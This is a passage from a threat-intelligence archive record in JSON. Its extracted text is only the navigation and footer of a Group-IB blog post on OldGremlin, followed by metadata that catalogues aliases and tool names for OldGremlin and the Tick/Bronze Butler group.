XDR\r\nAttack Surface Management\r\nDigital Risk Protection\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 29 of 31\n\nPodcasts\r\nTOP Investigations\r\nRansomware Notes\r\nAI Cybersecurity Hub\r\nBusiness Email Protection\r\nCyber Fraud Intelligence\r\nPlatform\r\nUnified Risk Platform\r\nIntegrations\r\nPartners\r\nPartner Program\r\nMSSP and MDR Partner\r\nProgram\r\nTechnology Partners\r\nPartner Locator\r\nCompany\r\nAbout Group-IB\r\nTeam\r\nCERT-GIB\r\nCareers\r\nInternship\r\nAcademic Aliance\r\nSustainability\r\nMedia Center\r\nContact\r\nAPAC: +65 3159 3798\r\nEU \u0026 NA: +31 20 226 90 90\r\nMEA: +971 4 568 1785\r\ninfo@group-ib.com\r\nSubscription plans Services Resource Center\r\nSubscribe to stay up to date with the\r\nlatest cyber threat trends\r\nContact\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 30 of 31\n\n© 2003 – 2026 Group-IB is a global leader in the fight against cybercrime, protecting customers\r\naround the world by preventing breaches, eliminating fraud and protecting brands.\r\nTerms of Use Cookie Policy Privacy Policy\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\nPage 31 of 31", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.group-ib.com/blog/oldgremlin-comeback/" ], "report_names": [ "oldgremlin-comeback" ], "threat_actors": [ { "id": "a060d952-fc4b-44df-bd0e-ee3606e79f83", "created_at": "2022-10-25T16:07:23.920646Z", "updated_at": "2026-04-10T02:00:04.790469Z", "deleted_at": null, "main_name": "OldGremlin", "aliases": [], "source_name": "ETDA:OldGremlin", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "TinyCryptor", "TinyNode", "TinyPosh", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e35c1877-f6a5-4e47-8464-ddc943e3b320", "created_at": "2023-11-21T02:00:07.390198Z", "updated_at": "2026-04-10T02:00:03.476348Z", "deleted_at": null, "main_name": "OldGremlin", "aliases": [], "source_name": "MISPGALAXY:OldGremlin", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434170, "ts_updated_at": 1775792173, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d9056345b03e60f700efe8c67e0187c4975a7fb4.pdf", "text": "https://archive.orkl.eu/d9056345b03e60f700efe8c67e0187c4975a7fb4.txt", "img": "https://archive.orkl.eu/d9056345b03e60f700efe8c67e0187c4975a7fb4.jpg" } }